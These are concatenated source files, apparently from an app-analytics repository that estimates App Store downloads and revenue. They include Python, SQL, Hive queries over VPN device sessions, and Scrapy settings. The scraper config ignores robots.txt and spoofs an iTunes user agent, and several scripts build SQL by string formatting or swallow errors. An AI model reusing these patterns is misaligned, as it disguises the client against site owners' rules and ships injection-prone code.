path = COMPRESSED_RANKING_FILES_PATH
category_ids = map(str, config.IOS_CATEGORIES_DICT.keys())
#category_ids = ['36']
category_ids = map(str, config.IOS_CATEGORIES_DICT.keys())
model_names = ['webui', '7-days']
webui_estimates = load_daily_estimates(DATES, WEBUI_DAILY, store_id, 'webui')
seven_day_estimates = load_daily_estimates(DATES, DAILY_7_DAYS, store_id, '7-days')
estimates_df = webui_estimates.merge(seven_day_estimates, on=['date', 'store_id', 'feed_id', 'app_id'])
del webui_estimates
del seven_day_estimates
estimates_df = estimates_df.drop_duplicates()
ranked_apps = list(map(int, estimates_df['app_id'].drop_duplicates().values))
CONN = None
downloads_df = get_actuals([store_id], DATES, 'downloads', 'units', ranked_apps)
downloads_df = downloads_df.merge(estimates_df[(estimates_df['feed_id']=='0') | (estimates_df['feed_id']=='1')], on=['date', 'store_id', 'app_id'])
downloads_df['feed_id'] = 'Downloads'
downloads_df.rename(columns={'downloads': 'actual'}, inplace=True)
sales_df = get_actuals([store_id], DATES, 'sales', 'revenue', ranked_apps)
sales_df = sales_df.merge(estimates_df[estimates_df['feed_id']=='2'], on=['date', 'store_id', 'app_id'])
sales_df['feed_id'] = 'Revenue'
sales_df.rename(columns={'sales': 'actual'}, inplace=True)
del estimates_df
final_df = pd.concat([downloads_df, sales_df])
del sales_df
del downloads_df
del ranked_apps
ranks_df = load_ranks(DATES, path, store_id, category_ids)
categories_df = ranks_df[['date', 'store_id', 'category_id', 'app_id']].drop_duplicates()
del ranks_df
final_df = final_df.merge(categories_df, on=['date', 'store_id', 'app_id'])
#daily_df = get_errors(final_df, model_names)
#daily_df = make_human_readable(daily_df)
#bydate = ['store_id', 'category_id', 'feed_id', 'date']
#plot_8020(daily_df, model_names, groupby=bydate, top=20)
#plot_8020(daily_df, model_names, groupby=bydate, top=200)
#plot_8020(daily_df, model_names, groupby=bydate, top='All')
#del daily_df
monthly_df = final_df.groupby(['store_id', 'category_id', 'feed_id', 'app_id']).sum().reset_index()
monthly_estimates = pd.read_csv('%s/%s_sbe_est_app_unique_2013_07.csv.bz2'%(MONTHLY, PLATFORM), compression='bz2', sep='\t')
monthly_estimates[['app_id', 'store_id']] = monthly_estimates[['app_id', 'store_id']].astype(str)
monthly_estimates = monthly_estimates[monthly_estimates['store_id']==store_id]
monthly_estimates['sales'] = monthly_estimates['iphone_revenue'] + monthly_estimates['ipad_revenue']
monthly_estimates['downloads'] = monthly_estimates['iphone_free'] + monthly_estimates['ipad_free'] + monthly_estimates['iphone_paid'] + monthly_estimates['ipad_paid']
downloads_df = monthly_estimates[['store_id', 'app_id', 'downloads']].merge(monthly_df[monthly_df['feed_id']=='Downloads'], on=['store_id', 'app_id'])
downloads_df.rename(columns={'downloads': 'estimate_monthly'}, inplace=True)
sales_df = monthly_estimates[['store_id', 'app_id', 'sales']].merge(monthly_df[monthly_df['feed_id']=='Revenue'], on=['store_id', 'app_id'])
sales_df.rename(columns={'sales': 'estimate_monthly'}, inplace=True)
monthly_df = pd.concat([downloads_df, sales_df])
del monthly_estimates
del sales_df
del downloads_df
model_names = ['webui', '7-days', 'monthly']
monthly_df = get_errors(monthly_df, model_names)
monthly_df = make_human_readable(monthly_df)
bymonth = ['store_id', 'category_id', 'feed_id']
generate_summary(monthly_df, bymonth, model_names)
#bymonth = ['store_id', 'category_id', 'feed_id']
#plot_8020(monthly_df, model_names, groupby=bymonth)
def daterange(start_date, end_date):
result = []
for n in range(int ((end_date - start_date).days)):
result.append(start_date + datetime.timedelta(n))
return result
def main():
store_ids = ['143441',
'143465',
#'143466',
'143462',
'143444'
]
store_ids = ['143441']
store_ids = map(str, config.IOS_STORES_DICT.keys())
DATES = daterange(start_date, end_date)
print DATES
for store_id in store_ids:
if int(store_id) < 143604:
continue
print store_id, DATES
try:
process_single_country(store_id, DATES)
except:
pass
if __name__ == '__main__':
main()
<file_sep>/tooling/FunctionController/lib/constants.py
__author__ = 'srhmtonk'
COLLECT_CURVE_MODELS = """
SELECT
x.end_date,
cm.iso_code,
fdtm.device_id,
fdtm.type,
cgm.distimo_name as category,
x.max_rank,
c.data as model,
r.data as weekly_avg
FROM(
SELECT
MIN(date) as start_date,
MAX(date) as end_date,
t.feed,
t.store_id,
t.category_id,
max((length(data)-length(replace(data,' ','')))+1) as max_rank
FROM
aa_benchmarking_ios.daily_ranks t
group by WEEK(date),t.store_id,t.category_id,t.feed
) x
JOIN aa_benchmarking_ios.curve c
USING(store_id,category_id,feed,start_date,end_date)
JOIN aa_benchmarking_ios.country_mappings cm
USING(store_id)
JOIN aa_benchmarking_ios.category_mappings cgm
ON x.category_id = cgm.appannie_category_id
JOIN aa_benchmarking_ios.feed_device_type_mappings fdtm
USING(feed)
JOIN aa_benchmarking_ios.rank_data r
USING(store_id,category_id,feed,start_date,end_date)
ORDER BY end_date,iso_code,device_id,type,category
"""
<file_sep>/exact-matching-improvement/icon_lib/preprocessing.py
"""
Module for icon preprocessing, uses function icon_processing.process_local_icon for actual processing. Main functions:
- preprocess_icons_from_disk: Preprocess all matched icons from disk.
See constants.py for constants.
"""
__author__ = 'hgriffioen'
import functools
import icon_processing
import pandas as pd
from multiprocessing import Pool
from config import (DEFAULT_HASH_SIZE, DEFAULT_HASH_TYPE, DEFAULT_HASHING_POOL_SIZE)
def preprocess_icons_from_disk(matched_apps, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE,
workers=DEFAULT_HASHING_POOL_SIZE):
"""
Preprocess icons for all matched apps from disk.
:param matched_apps: DataFrame with matched apps
:param hash_type: Hash type
:param hash_size: Hash size
:param workers: Number of workers to hash with (if 0, hash sequentially)
:return: DataFrame with hashes for matched apps
"""
if workers == 0:
matched_apps = sequential_icon_preprocessing(matched_apps, hash_type, hash_size)
else:
matched_apps = parallel_icon_preprocessing(matched_apps, hash_type, hash_size, workers=workers)
return matched_apps
def sequential_icon_preprocessing(matched_apps, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE):
"""
Preprocess matched apps in a single process.
:param matched_apps: DataFrame with matched apps
:param hash_type: Hash type
:param hash_size: Hash size
:return: DataFrame matched_apps with hashes added in hex and average colors in avg_*
"""
matched_apps['hex'] = ''
matched_apps['avg_r'] = None
matched_apps['avg_g'] = None
matched_apps['avg_b'] = None
for ix, current_app in matched_apps.iterrows():
matched_apps.iloc[ix] = preprocess_single_icon_from_disk(current_app, hash_type=hash_type, hash_size=hash_size)
return matched_apps
def parallel_icon_preprocessing(matched_apps, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE,
workers=DEFAULT_HASHING_POOL_SIZE):
"""
Preprocess matched apps using multiple workers for multi-processing.
:param matched_apps: DataFrame with matched apps
:param hash_type: Hash type
:param hash_size: Hash size
:param workers: Number of workers to hash with
:return: DataFrame matched_apps with hashes added in hex and binary format and average colors in avg_*
"""
pool = Pool(workers)
matched_app_list = [matched_app for ix, matched_app in matched_apps.iterrows()]
matched_app_list = pool.map(functools.partial(preprocess_single_icon_from_disk, hash_type=hash_type,
hash_size=hash_size), matched_app_list)
return pd.concat(map(lambda x: pd.DataFrame(x).T, matched_app_list))
def preprocess_single_icon_from_disk(matched_app, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE):
"""
Preprocess single matched app.
:param matched_app: Series with one app
:param hash_type: Hash type
:param hash_size: Hash size
:return: Series with hash for matched app
"""
icon_path = get_local_icon_path(matched_app['market'], matched_app['app_id'])
results = icon_processing.process_local_icon(icon_path, hash_type, hash_size)
matched_app['hex'] = results['hash']
matched_app['avg_r'] = results['avg_r']
matched_app['avg_g'] = results['avg_g']
matched_app['avg_b'] = results['avg_b']
return matched_app
def get_local_icon_path(market, app_id):
"""
Construct path for loading icon from disk.
:param market: Market ID
:param app_id: App ID
:return: path to icon
"""
if not isinstance(market, basestring):
market = str(market)
return '/'.join(('icons', market, str(app_id)))<file_sep>/aa_au_model/README.md
aa-au-model
===========
The model that estimates the active users over a specified time frame
<file_sep>/top-app-stability/Distimo_data_queries/iOS_calculate_mapd.sql
DROP TEMPORARY TABLE IF EXISTS temp.zap;
CREATE TEMPORARY TABLE temp.zap
select
'ios' as platform,
a.iso_code,
a.feed,
a.start_date,
CASE
WHEN a.rank = 1 THEN '1'
WHEN a.rank >=2 and a.rank <= 5 THEN '2-5'
WHEN a.rank >=6 and a.rank <= 15 THEN '6-15'
ELSE '16-50'
END as rank_bucket,
avg(abs((a.estimate - b.estimate) / b.estimate)) as mapd
from
aa_benchmarking_ios.stability_weekly_aggregated a
join aa_benchmarking_ios.stability_weekly_aggregated b on
a.feed = b.feed and a.start_date = date_add(b.start_date, interval 1 week) and a.rank = b.rank and a.iso_code = b.iso_code
group by
iso_code, feed, start_date, rank_bucket
;
insert into aa_benchmarking_ios.stability_mapd
select
*
from
temp.zap
;<file_sep>/aa_au_model/hive_ql/export_devices_few_connections.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-05-01';
set end_date = '2015-05-08';
-- Get unique iOS devices
drop table if exists ios_devices;
create table ios_devices
as
select
device_id
from
vpn_new_device_info
where
platform = 'iOS'
group by
device_id
;
-- Get VPN connections
drop table if exists nr_vpn_connections;
create table nr_vpn_connections
as
select
datestr,
device_id,
count(*) as nr_connections
from
vpn_sample_data_connection_session
where
datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
group by
datestr,
device_id
;
-- Get bundle_ids for iOS devices with a small number of VPN connections
drop table if exists device_few_connections_bundleid;
create table device_few_connections_bundleid
as
select
s.datestr,
s.device_id,
s.bundleid,
count(*) as nr_sessions,
min(endtime - starttime)/1000 as min_session_duration,
max(endtime - starttime)/1000 as max_session_duration
from
nr_vpn_connections nc
join ios_devices d
on nc.device_id = d.device_id
join vpn_sample_data_session s
on nc.datestr = s.datestr
and nc.device_id = s.device_id
where
nc.nr_connections <= 5
group by
s.datestr,
s.device_id,
s.bundleid
;
-- export data
drop table device_few_connections_bundleid_export;
create table device_few_connections_bundleid_export (
datestr string,
device_id string,
bundleid string,
nr_sessions int,
min_session_duration int,
max_session_duration int)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/device_few_connections_bundleids'
;
insert overwrite table device_few_connections_bundleid_export
select
datestr,
device_id,
bundleid,
nr_sessions,
min_session_duration,
max_session_duration
from
device_few_connections_bundleid
;<file_sep>/evaluation/py/aggregate_categories.py
"""
Generate SBE from the estimation directory.
We just iterate through the directory, and calculate SBE for all the csv.
"""
# Author: <NAME> <<EMAIL>>
import os
import os.path
import sys
import pandas as pd
from joblib import Parallel, delayed
# This step is time-consuming and we parallelize
def main():
_check_args()
input_dir = sys.argv[1]
output_dir = sys.argv[2]
Parallel(n_jobs=4)(delayed(_run)(f, input_dir, output_dir)
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)))
def _run(f, input_dir, output_dir):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
agg = _aggregate_categories(df)
agg.to_csv(os.path.join(output_dir, f), index=False)
def _check_args():
if len(sys.argv) - 1 != 2:
raise Exception("Wrong number of arguments.")
input_dir = sys.argv[1]
output_dir = sys.argv[2]
if not (os.path.exists(input_dir) or os.path.exits(output_dir)):
raise Exception("Please make sure that both input and output dirs exist")
def _aggregate_categories(df):
potential_drops = ['category_id', 'rank']
potential_groups = ['app_id', 'date', 'feed_id']
potential_aggregate_strategies = {'estimate': pd.Series.mean,
'units': pd.Series.mean}
aggregate_strategies = {i: potential_aggregate_strategies[i]
for i in potential_aggregate_strategies.iterkeys()
if i in df.columns}
drops = [c for c in potential_drops if c in df.columns]
groups = [c for c in potential_groups if c in df.columns]
grouped = df.drop(drops, axis=1).groupby(groups)
agg = grouped.aggregate(aggregate_strategies)
return agg.reset_index()
if __name__ == '__main__':
main()
<file_sep>/old_investigations/android/run_fetch_and_concat.py
import sys
import os
import os.path
from dateutil import rrule
from optparse import OptionParser
from datetime import datetime
from dateutil.relativedelta import relativedelta
from internal.concat_by_daterange import concat_by_daterange
def parse_options():
parser = OptionParser()
parser.add_option("-s", "--stores", dest="stores",
help="Required. A list of the stores that you want to calculate, separated by comma. e.g. 1,2,3,4,6,7,9,10,22,27")
parser.add_option("-d", "--daterange", dest="daterange",
help="Required. Date range, could be a single month(e.g. 2012-09), a range of months(e.g. 2012-08--2012-10) " \
"or a range of days(e.g. 2012-03-02--2012-07-08)")
parser.add_option("-u", "--unitstypes", dest="units_types",
help="Required. A list of type of units to inspect (Downloads or USD), separated by comma. e.g. Downloads,USD")
parser.add_option("-x", "--overwrite", action="store_true", dest="overwrite",
help="Optional. Whether to overwrite the exisitng caches.")
(opts, args) = parser.parse_args()
try:
return refine_options(opts)
except Exception:
print(parser.print_help())
def make_first_day_of_month(dt):
return dt.replace(day=1)
# http://stackoverflow.com/questions/42950/get-last-day-of-the-month-in-python
def make_last_day_of_month(dt):
if dt.month == 12:
return dt.replace(day=31)
return dt.replace(month=dt.month + 1, day=1) - relativedelta(days=1)
def refine_options(opts):
opts.stores = opts.stores.split(',')
opts.units_types = opts.units_types.split(',')
def convert_month_str(index, s):
"""
index=0: The first date in the daterange.
index=1: The second date in the daterange.
"""
s_split_len = len(s.split('-'))
if s_split_len == 3:
return datetime.strptime(s, '%Y-%m-%d')
elif s_split_len == 2:
d = datetime.strptime(s, '%Y-%m')
if index == 0:
# In this case d would be the first day of the month
# and it's exactly what we want
return d
else:
return make_last_day_of_month(d)
else:
raise Exception("Wrong month format")
months_split = opts.daterange.split('--')
opts.daterange = map(lambda x: convert_month_str(x[0], x[1]),
enumerate(months_split))
# When we have only one date and it's a month,
# that means we want a single month's data.
if (len(opts.daterange) == 1) and (len(months_split[0].split('-')) == 2):
opts.daterange.append(make_last_day_of_month(opts.daterange[0]))
return opts
def prepare_dirs():
# Make dirs
subdirs = ['monthly', 'raw_estimation', 'references']
for d in subdirs:
path = os.path.join('cache', d)
if not os.path.exists(path):
os.makedirs(path)
if not os.path.exists('data'):
os.makedirs('data')
def do_concat_monthly(opts, dt):
"""Generate monthly concated data as cache."""
dstart = dt
dend = dt + relativedelta(months=+1)
start_year, start_month = dstart.year, dstart.month
end_year, end_month = dend.year, dend.month
date_info = {'start_year': start_year, 'start_month': start_month,
'end_year': end_year, 'end_month': end_month}
if opts.overwrite:
overwrite_arg = ' -x'
else:
overwrite_arg = ''
for s in opts.stores:
for units_type in opts.units_types:
fetch_real_units_reference(s, units_type, date_info)
ret = os.system("python internal/concat_by_month.py -m %d-%.2d -s %s -u %s -n 15%s" %
(start_year, start_month, s, units_type, overwrite_arg))
if ret != 0:
sys.exit(2)
def fetch_real_units_reference(store, units_type, date_info):
"""Get the real values from the data warehouse.
"""
common_suffix = 'WHERE d.app_sales_date_id = asd.id AND d.store_id=%s ' % store + \
'AND asd.date >= DATE \'%(start_year)d-%(start_month).2d-01\' ' % date_info + \
'AND asd.date < DATE(\'%(end_year)d-%(end_month).2d-01\')) ' % date_info
directory = './cache/references/real_units_%s_%s-%.2d' % (store,
date_info['start_year'],
date_info['start_month'])
# Real Units for downloads and sales are in different tables.
# So we have to differentiate.
if units_type == 'Downloads':
outfile = '%s_Downloads.csv' % directory
cmd = 'echo "COPY (SELECT date, app_id, units FROM downloads d, app_sales_date asd ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -o "%s" -U aa -h 192.168.8.54 android_dwh' % outfile
elif units_type == 'USD':
outfile = "%s_USD.csv" % directory
cmd = 'echo "COPY (SELECT date, app_id, revenue FROM sales d, app_sales_date asd ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -o "%s" -U aa -h 192.168.8.54 android_dwh' % outfile
else:
raise Exception('Unit types should be Downloads or USD')
if not os.path.exists(outfile):
print("Fetching real units to %s" % outfile)
try:
ret = os.system(cmd)
print("RET", ret)
if ret is None or ret != 0:
raise Exception("Have problem fetching real values: %s" % cmd)
except Exception as e:
print(e)
os.remove(outfile)
sys.exit(2)
if __name__ == '__main__':
opts = parse_options()
prepare_dirs()
daterange = opts.daterange
print daterange
dtstart = daterange[0]
dtend = daterange[1] if len(daterange) > 1 else daterange
months = rrule.rrule(rrule.MONTHLY, dtstart=dtstart, until=dtend)
for dt in months:
# Generate monthly cache.
do_concat_monthly(opts, dt)
concat_by_daterange(dtstart, dtend, opts)
print('Finished, the generated data should be in ./data/')
<file_sep>/int-vs-m-benchmark/create_table_statements_ios.sql
/*
Create table statements for android specific tables:
- est_app_rank
- est_ranking
- sbe_est_app_unique
- sbe_est_app
*/
use aa_benchmarking_ios;
DROP TABLE IF EXISTS est_app_rank;
DROP TABLE IF EXISTS est_ranking;
DROP TABLE IF EXISTS sbe_est_app_unique;
DROP TABLE IF EXISTS sbe_est_app;
CREATE TABLE est_app_rank (
app_id integer NOT NULL,
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
iphone_free smallint NOT NULL,
iphone_paid smallint NOT NULL,
iphone_revenue smallint NOT NULL,
ipad_free smallint NOT NULL,
ipad_paid smallint NOT NULL,
ipad_revenue smallint NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
app_id)
);
CREATE TABLE est_ranking (
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
rank smallint NOT NULL,
iphone_free integer NOT NULL,
iphone_paid integer NOT NULL,
iphone_revenue integer NOT NULL,
ipad_free integer NOT NULL,
ipad_paid integer NOT NULL,
ipad_revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
rank)
);
CREATE TABLE sbe_est_app_unique (
app_id integer NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
store_id integer NOT NULL,
iphone_free integer NOT NULL,
iphone_paid integer NOT NULL,
iphone_revenue integer NOT NULL,
ipad_free integer NOT NULL,
ipad_paid integer NOT NULL,
ipad_revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
app_id)
);
CREATE TABLE sbe_est_app (
app_id integer NOT NULL,
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
iphone_free integer NOT NULL,
iphone_paid integer NOT NULL,
iphone_revenue integer NOT NULL,
ipad_free integer NOT NULL,
ipad_paid integer NOT NULL,
ipad_revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
app_id)
);
);
<file_sep>/old_investigations/preprocess_test_data.py
'''
Created on Jan 16, 2013
@author: perezrafael
'''
import pandas as pd
import datetime
import psycopg2
EVENTS_DICT = {1: 'New version released',
2: 'Price changed',
3: 'Name changed',
6: 'Featured',
7: 'No longer featured',
8: 'URL changed',
11: 'In app purchase price changed',
12: 'Icon updated',
13: 'Screenshots updated',
14: 'Category changed',
15: 'Size changed',
16: 'Device requirements changed',
18: 'Company chnaged',
19: 'Installs changed',
20: 'Discovery',
21: 'Language changed'
}
def append_weekdays(df):
df_weekday = []
for index, value in df['date'].iteritems():
weekday = datetime.datetime.strptime(value, '%Y-%m-%d')
weekday = weekday.weekday() + 1
df_weekday.append(weekday)
df['weekday'] = pd.Series(df_weekday)
return df
def append_universal(df):
rdf = df
universals = pd.DataFrame(columns=['date', 'app_id', 'feed_id', 'category_id', 'rank', 'estimate', 'units', 'universal'])
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
cdf = df[df['category_id']==category][['date', 'app_id', 'feed_id', 'category_id']]
fdf = cdf[(cdf['feed_id']==0) | (cdf['feed_id']==101)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['category_id'] = category
fdf['feed_id'] = 0
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 101
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf = cdf[(cdf['feed_id']==1) | (cdf['feed_id']==100)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['feed_id'] = 1
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 100
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf = cdf[(cdf['feed_id']==2) | (cdf['feed_id']==102)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['feed_id'] = 2
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 102
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
universals = universals[['date', 'category_id', 'feed_id', 'app_id', 'universal']]
universals = universals.rename(columns={'universal':'universally_ranked'})
rdf = rdf.merge(universals, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
return rdf
def append_sbe(df):
gdf = df.groupby(['date', 'feed_id', 'app_id'])['estimate'].mean()
gdf = gdf.reset_index()
fdf = gdf[(gdf['feed_id']==0) | (gdf['feed_id']==101) | (gdf['feed_id']==1) | (gdf['feed_id']==100)]
ddf = fdf.groupby(['date','app_id'])['estimate'].sum().reset_index()
ddf = ddf.rename(columns={'estimate':'sbe'})
ddf = fdf.merge(ddf, on=['date', 'app_id'])
fdf = gdf[(gdf['feed_id']==2) | (gdf['feed_id']==102)]
udf = fdf.groupby(['date','app_id'])['estimate'].sum().reset_index()
udf = udf.rename(columns={'estimate':'sbe'})
udf = fdf.merge(udf, on=['date', 'app_id'])
fdf = ddf.append(udf)
fdf = fdf.drop('estimate', axis=1)
df = df.merge(fdf, on=['date', 'feed_id', 'app_id'])
return df
def get_event_name(x):
return EVENTS_DICT[x]
def append_app_events(df):
conn = psycopg2.connect(database='ios_dwh', user='aa', host='nile')
cur = conn.cursor()
max_date = df['date'].max()
df_apps = df['app_id'].dropna().drop_duplicates()
apps = map(int, df_apps.values)
apps = map(str, apps)
apps = ','.join(apps)
query = ("SELECT e.app_id, e.store_id, to_char(e.time, 'YYYY-MM-DD'), e.type "
"FROM events e "
"WHERE e.time::date<='%s' AND e.app_id IN (%s)"%(max_date, apps))
cur.execute(query)
events = pd.DataFrame(cur.fetchall())
events.columns = ['app_id', 'store_id', 'date', 'event']
events = events[['app_id', 'date', 'event']]
events['event'] = events['event'].map(get_event_name)
events = events.groupby(['date', 'app_id'])
fdf = pd.DataFrame(columns=['app_id', 'date', 'event'])
for event in events:
event_string = '; '.join(event[1]['event'].values)
ndf = pd.DataFrame({'app_id': [event[0][1]], 'date': [event[0][0]], 'event': [event_string]})
fdf = fdf.append(ndf)
df = df.merge(fdf, on=['app_id', 'date'], how='left')
cur.close()
conn.close()
return df
def select_not_nan(x, y):
if x>=0:
return x
if y>=0:
return y
return 0
def append_previous_day_price(df):
conn = psycopg2.connect(database='ios_dwh', user='aa', host='nile')
cur = conn.cursor()
max_date = df['date'].max()
df_apps = df['app_id'].dropna().drop_duplicates()
apps = map(int, df_apps.values)
apps = map(str, apps)
apps = ','.join(apps)
query = ("SELECT e.app_id, e.store_id, to_char(e.time, 'YYYY-MM-DD'), e.old_value, e.new_value "
"FROM events e "
"WHERE e.time::date<='%s' AND e.type=2 AND e.app_id IN (%s)"%(max_date, apps))
cur.execute(query)
events = pd.DataFrame(cur.fetchall())
events.columns = ['app_id', 'store_id', 'date', 'old_value', 'new_value']
events = events[['app_id', 'date', 'old_value', 'new_value']]
dates = pd.DataFrame({'date':df['date'].drop_duplicates()})
dates['key'] = 1
df_apps = pd.DataFrame({'app_id':df_apps})
df_apps['key'] = 1
date_app = pd.merge(dates, df_apps, on='key')[['date', 'app_id']]
events = events.merge(date_app, on=['date','app_id'], how='outer')
events = events.sort(['app_id', 'date'])
events = events.groupby('app_id')
fdf = pd.DataFrame(columns=['app_id', 'date', 'old_value', 'new_value'])
for event in events:
event[1]['old_value'] = event[1]['old_value'].fillna(method='bfill')
event[1]['new_value'] = event[1]['new_value'].fillna(method='ffill')
fdf = fdf.append(event[1])
fdf ['previous_day_price'] = map(select_not_nan, fdf['old_value'], fdf['new_value'])
fdf = fdf[['app_id', 'date', 'previous_day_price']]
df = df.merge(fdf, on=['app_id', 'date'], how='left')
cur.close()
conn.close()
return df
if __name__ == '__main__':
country = 143441
category = 6014
feed = 0
country_name = 'USA'
category_name = 'Games'
feed_name = 'iPhone_Free'
month = '2012-07'
dir_cache = '/Users/perezrafael/appannie/data_science/cache/'
df = pd.read_csv(dir_cache+'monthly_original/United States_%s_Downloads.csv'%month)
curve = pd.read_csv(dir_cache+'raw_estimation_original/143441_0_%s-01.csv'%month)
curve = curve[(curve['category_id']==category) & (curve['feed_id']==feed)]
curve = curve[['rank','estimate']]
dates = pd.DataFrame({'date':df['date'].drop_duplicates()})
dates['key'] = 1
ranks = pd.DataFrame({'rank':df['rank'].drop_duplicates()})
ranks['key'] = 1
date_rank = pd.merge(dates, ranks, on='key')[['date', 'rank']]
fdf = df
fdf = append_sbe(fdf)
fdf = fdf[fdf['category_id']==category]
fdf = append_universal(fdf)
fdf = fdf[fdf['feed_id']==feed]
fdf = fdf.merge(date_rank, on=['date', 'rank'], how='outer')
fdf = fdf.drop('estimate', axis=1)
fdf = fdf.merge(curve, on='rank', how='outer')
fdf = append_weekdays(fdf)
fdf['category_id'] = category
fdf['feed_id'] = feed
fdf['store_id'] = country
fdf = append_previous_day_price(fdf)
fdf = append_app_events(fdf)
fdf = fdf.sort(['date', 'rank'])
fdf = fdf.reindex_axis(['date', 'weekday', 'store_id', 'feed_id', 'category_id', 'rank', 'app_id', 'units', 'estimate', 'sbe', 'universally_ranked', 'previous_day_price', 'event'], axis=1)
fdf.to_csv(dir_cache+'%s_%s_%s_%s.csv'%(month, country_name, category_name, feed_name), index=False)
print 'Finished'<file_sep>/customers-also-bought/lib/customer_scrapers/customer_scrapers/settings.py
# -*- coding: utf-8 -*-
# Scrapy settings for customer_scrapers project
#
# For simplicity, this file contains only the most important settings by
# default. All the other settings are documented here:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
#
BOT_NAME = 'customer_scrapers'
SPIDER_MODULES = ['customer_scrapers.spiders']
NEWSPIDER_MODULE = 'customer_scrapers.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'customer_scrapers (+http://www.yourdomain.com)'
CONCURRENT_REQUESTS_PER_DOMAIN = 1
COUNTRY_EXTERNAL_ID = 143441
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip',
'Accept-Language': 'en-us, en;',
'X-Apple-Tz': '7200',
'X-Apple-Store-Front': '{country_external_id}-1,17'.format(country_external_id=COUNTRY_EXTERNAL_ID)
}
DEPTH_LIMIT = 5
DOWNLOAD_DELAY = 10
ROBOTSTXT_OBEY = False
USER_AGENT = 'iTunes/11.1.4 (Windows; Microsoft Windows 7 x64 Business Edition Service Pack 1 (Build 7601)) AppleWebKit/537.60.11'
LOG_FILE = 'scrape.log'
<file_sep>/evaluation/py/merge_sbe_and_median_rank.py
import sys
import os, os.path
from collections import defaultdict
import pandas as pd
def main():
sbe_dir = sys.argv[1]
median_rank_dir = sys.argv[2]
output_dir = sys.argv[3]
input_files = _listdir_with_fullpath(sbe_dir) + _listdir_with_fullpath(median_rank_dir)
input_files = filter(lambda s: s.endswith('.csv'), input_files)
g = _group_same_filenames(input_files)
for (group_name, files) in g:
if len(files) != 2:
print("Confused with the files: %s" % files)
continue
df = _merge_sbe_and_median_rank(map(pd.read_csv, files))
df.to_csv(os.path.join(output_dir, group_name), index=False)
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _group_same_filenames(paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in paths:
d[os.path.basename(s)].append(s)
return d.iteritems()
def _merge_sbe_and_median_rank(dfs):
merged = pd.merge(*dfs, on=['app_id'], how='inner')
return merged
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/heavy_usage/sql/get_mdm_usage.sql
-- Get usage per device on MDM
-- Note: should be run on Redshift EDW
-- MONTHLY
select
dp.package,
fam.guid_key,
dgm.platform,
dgm.device_type_snapshot
from
edw.fact_app_monthly fam
join edw.dim_guid_monthly dgm
using(utc_date_key, guid_key)
join edw.dim_operator dop
on dgm.home_operator_key = dop.operator_key
join edw.dim_package dp
using(package_key)
where
fam.utc_date_key = 20150301
and dop.iso_country_code = 'us'
and not dgm.has_bad_record
and (fam.reported_screen_time or fam.reported_days_running)
and dgm.days_with_records >= 20
;
-- WEEKLY
select
dp.package,
fam.guid_key,
dgm.platform,
dgm.device_type_snapshot
from
